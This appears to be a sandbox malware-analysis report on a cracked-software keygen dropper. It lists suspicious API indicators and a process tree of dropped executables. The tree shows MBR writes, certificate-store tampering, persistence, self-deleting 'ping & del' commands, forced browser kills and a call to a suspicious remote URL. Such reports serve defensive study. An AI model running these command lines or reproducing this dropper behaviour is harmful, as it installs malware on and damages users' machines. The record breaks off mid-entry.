Token: SeSystemtimePrivilege	2292	msiexec.exe
Token: SeProfSingleProcessPrivilege	2292	msiexec.exe
Token: SeIncBasePriorityPrivilege	2292	msiexec.exe
Token: SeCreatePagefilePrivilege	2292	msiexec.exe
Token: SeCreatePermanentPrivilege	2292	msiexec.exe
Token: SeBackupPrivilege	2292	msiexec.exe
Token: SeRestorePrivilege	2292	msiexec.exe
Token: SeShutdownPrivilege	2292	msiexec.exe
Token: SeDebugPrivilege	2292	msiexec.exe
Token: SeAuditPrivilege	2292	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2292	msiexec.exe
Token: SeChangeNotifyPrivilege	2292	msiexec.exe
Token: SeRemoteShutdownPrivilege	2292	msiexec.exe
Token: SeUndockPrivilege	2292	msiexec.exe
Token: SeSyncAgentPrivilege	2292	msiexec.exe
Token: SeEnableDelegationPrivilege	2292	msiexec.exe
Token: SeManageVolumePrivilege	2292	msiexec.exe
Token: SeImpersonatePrivilege	2292	msiexec.exe
Token: SeCreateGlobalPrivilege	2292	msiexec.exe
Token: SeCreateTokenPrivilege	2292	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2292	msiexec.exe
Token: SeLockMemoryPrivilege	2292	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2292	msiexec.exe
Token: SeMachineAccountPrivilege	2292	msiexec.exe
Token: SeTcbPrivilege	2292	msiexec.exe
Token: SeSecurityPrivilege	2292	msiexec.exe
Token: SeTakeOwnershipPrivilege	2292	msiexec.exe
Token: SeLoadDriverPrivilege	2292	msiexec.exe
Token: SeSystemProfilePrivilege	2292	msiexec.exe
Token: SeSystemtimePrivilege	2292	msiexec.exe
Token: SeProfSingleProcessPrivilege	2292	msiexec.exe
Token: SeIncBasePriorityPrivilege	2292	msiexec.exe
Token: SeCreatePagefilePrivilege	2292	msiexec.exe
Token: SeCreatePermanentPrivilege	2292	msiexec.exe
Token: SeBackupPrivilege	2292	msiexec.exe
Token: SeRestorePrivilege	2292	msiexec.exe
Token: SeShutdownPrivilege	2292	msiexec.exe
Token: SeDebugPrivilege	2292	msiexec.exe
Token: SeAuditPrivilege	2292	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2292	msiexec.exe
Token: SeChangeNotifyPrivilege	2292	msiexec.exe
Token: SeRemoteShutdownPrivilege	2292	msiexec.exe
Token: SeUndockPrivilege	2292	msiexec.exe
Token: SeSyncAgentPrivilege	2292	msiexec.exe
Token: SeEnableDelegationPrivilege	2292	msiexec.exe
Token: SeManageVolumePrivilege	2292	msiexec.exe
Token: SeImpersonatePrivilege	2292	msiexec.exe
Token: SeCreateGlobalPrivilege	2292	msiexec.exe
Token: SeCreateTokenPrivilege	2292	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2292	msiexec.exe
Token: SeLockMemoryPrivilege	2292	msiexec.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

msiexec.exeIBInstaller_97039.tmpSetup3310.tmpchashepro3.tmpvpn.tmpfzxqxnyvuvb.tmpvict.tmpSetup.tmpProPlugin.tmp

pid	process
2292	msiexec.exe
5020	IBInstaller_97039.tmp
4588	Setup3310.tmp
4796	chashepro3.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
5092	fzxqxnyvuvb.tmp
1960	vict.tmp
5424	Setup.tmp
5464	ProPlugin.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp

Suspicious use of SetWindowsHookEx 53 IoCs

Processes:

Setup.exeAD754B4D3FE2C4EE.exeAD754B4D3FE2C4EE.exefirefox.exe1615161422550.exefirefox.exe1615161424082.exefzxqxnyvuvb.exeaskinstall24.exefzxqxnyvuvb.tmpIBInstaller_97039.exeIBInstaller_97039.tmpThunderFW.exevict.exevict.tmpchrome_proxy.exeSetup3310.exeSetup3310.tmpchashepro3.exechashepro3.tmpvpn.exeBrava.exe8.exevpn.tmpapp.exewinlthst.exewimapi.exeosdeweo1zdf.exeosdeweo1zdf.tmpSetup.exeSetup.tmpProPlugin.exeProPlugin.tmp7za.exechrome.exeSetup.exemain.exetapinstall.exe7za.exeDelta.exeDelta.tmpSetup.exezznote.exezznote.tmpjg4_4jaa.exehjjgaa.exejfiag3g_gg.exejfiag3g_gg.exeparse.exeparse.exeparse.exemask_svc.exemask_svc.exe

pid	process
3968	Setup.exe
2936	AD754B4D3FE2C4EE.exe
3936	AD754B4D3FE2C4EE.exe
2944	firefox.exe
4296	1615161422550.exe
4444	firefox.exe
4456	1615161424082.exe
4896	fzxqxnyvuvb.exe
4732	askinstall24.exe
5092	fzxqxnyvuvb.tmp
4220	IBInstaller_97039.exe
5020	IBInstaller_97039.tmp
5100	ThunderFW.exe
2252	vict.exe
1960	vict.tmp
4384	chrome_proxy.exe
1172	Setup3310.exe
4588	Setup3310.tmp
4816	chashepro3.exe
4796	chashepro3.tmp
5080	vpn.exe
2268	Brava.exe
4308	8.exe
4780	vpn.tmp
5316	app.exe
4844	winlthst.exe
5492	wimapi.exe
5068	osdeweo1zdf.exe
3696	osdeweo1zdf.tmp
4916	Setup.exe
5424	Setup.tmp
5920	ProPlugin.exe
5464	ProPlugin.tmp
2320	7za.exe
2504	chrome.exe
5440	Setup.exe
4392	main.exe
5224	tapinstall.exe
4468	7za.exe
5032	Delta.exe
5528	Delta.tmp
4936	Setup.exe
4700	zznote.exe
4944	zznote.tmp
208	jg4_4jaa.exe
6368	hjjgaa.exe
6832	jfiag3g_gg.exe
6952	jfiag3g_gg.exe
5344	parse.exe
6496	parse.exe
4548	parse.exe
3816	mask_svc.exe
4960	mask_svc.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Zonealarm.extreme.security.201.crack.by.CORE.execmd.exekeygen-pr.exekeygen-step-3.execmd.exekeygen-step-4.exekey.exeSetup.exemsiexec.execmd.exeAD754B4D3FE2C4EE.exe

description	pid	process	target process
PID 500 wrote to memory of 3140	500	Zonealarm.extreme.security.201.crack.by.CORE.exe	cmd.exe
PID 500 wrote to memory of 3140	500	Zonealarm.extreme.security.201.crack.by.CORE.exe	cmd.exe
PID 500 wrote to memory of 3140	500	Zonealarm.extreme.security.201.crack.by.CORE.exe	cmd.exe
PID 3140 wrote to memory of 3396	3140	cmd.exe	keygen-pr.exe
PID 3140 wrote to memory of 3396	3140	cmd.exe	keygen-pr.exe
PID 3140 wrote to memory of 3396	3140	cmd.exe	keygen-pr.exe
PID 3140 wrote to memory of 1932	3140	cmd.exe	keygen-step-1.exe
PID 3140 wrote to memory of 1932	3140	cmd.exe	keygen-step-1.exe
PID 3140 wrote to memory of 1932	3140	cmd.exe	keygen-step-1.exe
PID 3140 wrote to memory of 2988	3140	cmd.exe	keygen-step-3.exe
PID 3140 wrote to memory of 2988	3140	cmd.exe	keygen-step-3.exe
PID 3140 wrote to memory of 2988	3140	cmd.exe	keygen-step-3.exe
PID 3140 wrote to memory of 1164	3140	cmd.exe	keygen-step-4.exe
PID 3140 wrote to memory of 1164	3140	cmd.exe	keygen-step-4.exe
PID 3140 wrote to memory of 1164	3140	cmd.exe	keygen-step-4.exe
PID 3396 wrote to memory of 1288	3396	keygen-pr.exe	key.exe
PID 3396 wrote to memory of 1288	3396	keygen-pr.exe	key.exe
PID 3396 wrote to memory of 1288	3396	keygen-pr.exe	key.exe
PID 2988 wrote to memory of 2228	2988	keygen-step-3.exe	cmd.exe
PID 2988 wrote to memory of 2228	2988	keygen-step-3.exe	cmd.exe
PID 2988 wrote to memory of 2228	2988	keygen-step-3.exe	cmd.exe
PID 2228 wrote to memory of 3824	2228	cmd.exe	PING.EXE
PID 2228 wrote to memory of 3824	2228	cmd.exe	PING.EXE
PID 2228 wrote to memory of 3824	2228	cmd.exe	PING.EXE
PID 1164 wrote to memory of 3968	1164	keygen-step-4.exe	Setup.exe
PID 1164 wrote to memory of 3968	1164	keygen-step-4.exe	Setup.exe
PID 1164 wrote to memory of 3968	1164	keygen-step-4.exe	Setup.exe
PID 1288 wrote to memory of 1604	1288	key.exe	key.exe
PID 1288 wrote to memory of 1604	1288	key.exe	key.exe
PID 1288 wrote to memory of 1604	1288	key.exe	key.exe
PID 1288 wrote to memory of 1604	1288	key.exe	key.exe
PID 1288 wrote to memory of 1604	1288	key.exe	key.exe
PID 1288 wrote to memory of 1604	1288	key.exe	key.exe
PID 1288 wrote to memory of 1604	1288	key.exe	key.exe
PID 1288 wrote to memory of 1604	1288	key.exe	key.exe
PID 1288 wrote to memory of 1604	1288	key.exe	key.exe
PID 1288 wrote to memory of 1604	1288	key.exe	key.exe
PID 1288 wrote to memory of 1604	1288	key.exe	key.exe
PID 1288 wrote to memory of 1604	1288	key.exe	key.exe
PID 1288 wrote to memory of 1604	1288	key.exe	key.exe
PID 1288 wrote to memory of 1604	1288	key.exe	key.exe
PID 1288 wrote to memory of 1604	1288	key.exe	key.exe
PID 3968 wrote to memory of 2292	3968	Setup.exe	msiexec.exe
PID 3968 wrote to memory of 2292	3968	Setup.exe	msiexec.exe
PID 3968 wrote to memory of 2292	3968	Setup.exe	msiexec.exe
PID 3968 wrote to memory of 2936	3968	Setup.exe	AD754B4D3FE2C4EE.exe
PID 3968 wrote to memory of 2936	3968	Setup.exe	AD754B4D3FE2C4EE.exe
PID 3968 wrote to memory of 2936	3968	Setup.exe	AD754B4D3FE2C4EE.exe
PID 3968 wrote to memory of 3936	3968	Setup.exe	AD754B4D3FE2C4EE.exe
PID 3968 wrote to memory of 3936	3968	Setup.exe	AD754B4D3FE2C4EE.exe
PID 3968 wrote to memory of 3936	3968	Setup.exe	AD754B4D3FE2C4EE.exe
PID 3968 wrote to memory of 1732	3968	Setup.exe	cmd.exe
PID 3968 wrote to memory of 1732	3968	Setup.exe	cmd.exe
PID 3968 wrote to memory of 1732	3968	Setup.exe	cmd.exe
PID 1164 wrote to memory of 1900	1164	keygen-step-4.exe	askinstall20.exe
PID 1164 wrote to memory of 1900	1164	keygen-step-4.exe	askinstall20.exe
PID 1164 wrote to memory of 1900	1164	keygen-step-4.exe	askinstall20.exe
PID 2200 wrote to memory of 2716	2200	msiexec.exe	MsiExec.exe
PID 2200 wrote to memory of 2716	2200	msiexec.exe	MsiExec.exe
PID 2200 wrote to memory of 2716	2200	msiexec.exe	MsiExec.exe
PID 1732 wrote to memory of 2184	1732	cmd.exe	PING.EXE
PID 1732 wrote to memory of 2184	1732	cmd.exe	PING.EXE
PID 1732 wrote to memory of 2184	1732	cmd.exe	PING.EXE
PID 2936 wrote to memory of 2944	2936	AD754B4D3FE2C4EE.exe	firefox.exe

C:\Users\Admin\AppData\Local\Temp\Zonealarm.extreme.security.201.crack.by.CORE.exe
"C:\Users\Admin\AppData\Local\Temp\Zonealarm.extreme.security.201.crack.by.CORE.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:500
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3140
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
    keygen-pr.exe -p83fsase3Ge
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3396
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:1288
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
        5⤵
        Executes dropped EXE
        
        PID:1604
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
    keygen-step-1.exe
    3⤵
    - Executes dropped EXE
    PID:1932
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
    keygen-step-3.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2988
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2228
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        5⤵
        Runs ping.exe
        
        PID:3824
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
    keygen-step-4.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1164
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
      4⤵
      Executes dropped EXE
      Writes to the Master Boot Record (MBR)
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Modifies system certificate store
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:3968
    - - C:\Windows\SysWOW64\msiexec.exe
        
        msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
        5⤵
        Enumerates connected drives
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:2292
    - - C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe
        
        C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe 0011 installp1
        5⤵
        Executes dropped EXE
        Writes to the Master Boot Record (MBR)
        Suspicious use of SetThreadContext
        Checks SCSI registry key(s)
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:2936
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        6⤵
        Suspicious use of SetWindowsHookEx
        
        PID:2944
      - C:\Users\Admin\AppData\Roaming\1615161422550.exe
        
        "C:\Users\Admin\AppData\Roaming\1615161422550.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615161422550.txt"
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:4296
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        6⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4444
      - C:\Users\Admin\AppData\Roaming\1615161424082.exe
        
        "C:\Users\Admin\AppData\Roaming\1615161424082.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615161424082.txt"
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:4456
      - C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
        
        C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5100
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe"
        6⤵
        
        PID:5700
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        7⤵
        Runs ping.exe
        
        PID:5852
    - - C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe
        
        C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe 200 installp1
        5⤵
        Executes dropped EXE
        Writes to the Master Boot Record (MBR)
        Checks SCSI registry key(s)
        Suspicious use of SetWindowsHookEx
        
        PID:3936
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        6⤵
        
        PID:1480
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        7⤵
        Kills process with taskkill
        
        PID:4156
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe"
        6⤵
        
        PID:4348
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        7⤵
        Runs ping.exe
        
        PID:4408
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1732
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        6⤵
        Runs ping.exe
        
        PID:2184
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
      4⤵
      Executes dropped EXE
      Modifies system certificate store
      PID:1900
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        5⤵
        
        PID:4212
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        6⤵
        Kills process with taskkill
        
        PID:4268
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"
      4⤵
      Executes dropped EXE
      PID:4540
    - - C:\Users\Admin\AppData\Local\Temp\HJI0WAVTRP\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\HJI0WAVTRP\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:4648
      - C:\Users\Admin\AppData\Local\Temp\HJI0WAVTRP\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\HJI0WAVTRP\multitimer.exe" 1 3.1615157618.604559727ed9a 101
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:4164
        
        C:\Users\Admin\AppData\Local\Temp\HJI0WAVTRP\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\HJI0WAVTRP\multitimer.exe" 2 3.1615157618.604559727ed9a
        7⤵
        Executes dropped EXE
        Checks for any installed AV software in registry
        Maps connected drives based on registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:4160
        
        C:\Users\Admin\AppData\Local\Temp\0mp5yh2qj1i\fzxqxnyvuvb.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0mp5yh2qj1i\fzxqxnyvuvb.exe" /VERYSILENT
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4896
        
        C:\Users\Admin\AppData\Local\Temp\is-CSJ0A.tmp\fzxqxnyvuvb.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-CSJ0A.tmp\fzxqxnyvuvb.tmp" /SL5="$301F2,870426,780800,C:\Users\Admin\AppData\Local\Temp\0mp5yh2qj1i\fzxqxnyvuvb.exe" /VERYSILENT
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:5092
        
        C:\Users\Admin\AppData\Local\Temp\is-ULONN.tmp\winlthst.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-ULONN.tmp\winlthst.exe" test1 test1
        10⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4844
        
        C:\Users\Admin\AppData\Local\Temp\2yw1htpcnfi\askinstall24.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2yw1htpcnfi\askinstall24.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4732
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        9⤵
        
        PID:5884
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        10⤵
        Kills process with taskkill
        
        PID:6064
        
        C:\Users\Admin\AppData\Local\Temp\h3nfvsllhsp\yyz0xvqotxh.exe
        
        "C:\Users\Admin\AppData\Local\Temp\h3nfvsllhsp\yyz0xvqotxh.exe" /ustwo INSTALL
        8⤵
        Executes dropped EXE
        
        PID:4236
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 652
        9⤵
        Drops file in Windows directory
        Program crash
        
        PID:5568
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 668
        9⤵
        Program crash
        
        PID:5656
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 672
        9⤵
        Program crash
        
        PID:5764
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 668
        9⤵
        Program crash
        
        PID:5860
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 884
        9⤵
        Program crash
        
        PID:5292
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 948
        9⤵
        Program crash
        
        PID:4832
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 1180
        9⤵
        Program crash
        
        PID:6032
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 1192
        9⤵
        Program crash
        
        PID:5160
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 1296
        9⤵
        Program crash
        
        PID:5016
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 1228
        9⤵
        Suspicious use of NtCreateProcessExOtherParentProcess
        Program crash
        
        PID:4788
        
        C:\Users\Admin\AppData\Local\Temp\i0dg5jwvhb5\IBInstaller_97039.exe
        
        "C:\Users\Admin\AppData\Local\Temp\i0dg5jwvhb5\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4220
        
        C:\Users\Admin\AppData\Local\Temp\is-GV9KI.tmp\IBInstaller_97039.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-GV9KI.tmp\IBInstaller_97039.tmp" /SL5="$10276,14455514,721408,C:\Users\Admin\AppData\Local\Temp\i0dg5jwvhb5\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:5020
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c start http://gemstrue.shop/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
        10⤵
        
        PID:4412
        
        C:\Users\Admin\AppData\Local\Temp\is-B3N0O.tmp\{app}\chrome_proxy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-B3N0O.tmp\{app}\chrome_proxy.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4384
        
        C:\Users\Admin\AppData\Local\Temp\5lg3ha5huzz\t4ygtxmtzpf.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5lg3ha5huzz\t4ygtxmtzpf.exe" testparams
        8⤵
        Executes dropped EXE
        
        PID:5116
        
        C:\Users\Admin\AppData\Roaming\oplvxynz1ul\osdeweo1zdf.exe
        
        "C:\Users\Admin\AppData\Roaming\oplvxynz1ul\osdeweo1zdf.exe" /VERYSILENT /p=testparams
        9⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5068
        
        C:\Users\Admin\AppData\Local\Temp\is-HTSD8.tmp\osdeweo1zdf.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-HTSD8.tmp\osdeweo1zdf.tmp" /SL5="$202EE,536425,199680,C:\Users\Admin\AppData\Roaming\oplvxynz1ul\osdeweo1zdf.exe" /VERYSILENT /p=testparams
        10⤵
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        Suspicious use of SetWindowsHookEx
        
        PID:3696
        
        C:\Users\Admin\AppData\Local\Temp\5szqda51kbs\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5szqda51kbs\vict.exe" /VERYSILENT /id=535
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2252
        
        C:\Users\Admin\AppData\Local\Temp\is-VPRD0.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-VPRD0.tmp\vict.tmp" /SL5="$102DA,870426,780800,C:\Users\Admin\AppData\Local\Temp\5szqda51kbs\vict.exe" /VERYSILENT /id=535
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:1960
        
        C:\Users\Admin\AppData\Local\Temp\is-VV884.tmp\wimapi.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-VV884.tmp\wimapi.exe" 535
        10⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5492
        
        C:\Users\Admin\AppData\Local\Temp\1ikonewvu0d\hqbjfvxlzfo.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1ikonewvu0d\hqbjfvxlzfo.exe" 57a764d042bf8
        8⤵
        
        PID:4224
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k "C:\Program Files\D535R85FVP\D535R85FV.exe" 57a764d042bf8 & exit
        9⤵
        
        PID:4884
        
        C:\Program Files\D535R85FVP\D535R85FV.exe
        
        "C:\Program Files\D535R85FVP\D535R85FV.exe" 57a764d042bf8
        10⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:2864
        
        C:\Users\Admin\AppData\Local\Temp\uhyabbfngxs\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\uhyabbfngxs\Setup3310.exe" /Verysilent /subid=577
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1172
        
        C:\Users\Admin\AppData\Local\Temp\is-DE4F1.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-DE4F1.tmp\Setup3310.tmp" /SL5="$301FE,802346,56832,C:\Users\Admin\AppData\Local\Temp\uhyabbfngxs\Setup3310.exe" /Verysilent /subid=577
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:4588
        
        C:\Users\Admin\AppData\Local\Temp\is-8PEE2.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-8PEE2.tmp\Setup.exe" /Verysilent
        10⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4916
        
        C:\Users\Admin\AppData\Local\Temp\is-7OKB3.tmp\Setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-7OKB3.tmp\Setup.tmp" /SL5="$301C2,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-8PEE2.tmp\Setup.exe" /Verysilent
        11⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Windows directory
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:5424
        
        C:\Users\Admin\AppData\Local\Temp\is-8UHRH.tmp\ProPlugin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-8UHRH.tmp\ProPlugin.exe" /Verysilent
        12⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5920
        
        C:\Users\Admin\AppData\Local\Temp\is-8C9ES.tmp\ProPlugin.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-8C9ES.tmp\ProPlugin.tmp" /SL5="$4049C,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-8UHRH.tmp\ProPlugin.exe" /Verysilent
        13⤵
        Loads dropped DLL
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:5464
        
        C:\Users\Admin\AppData\Local\Temp\is-QBURG.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-QBURG.tmp\Setup.exe"
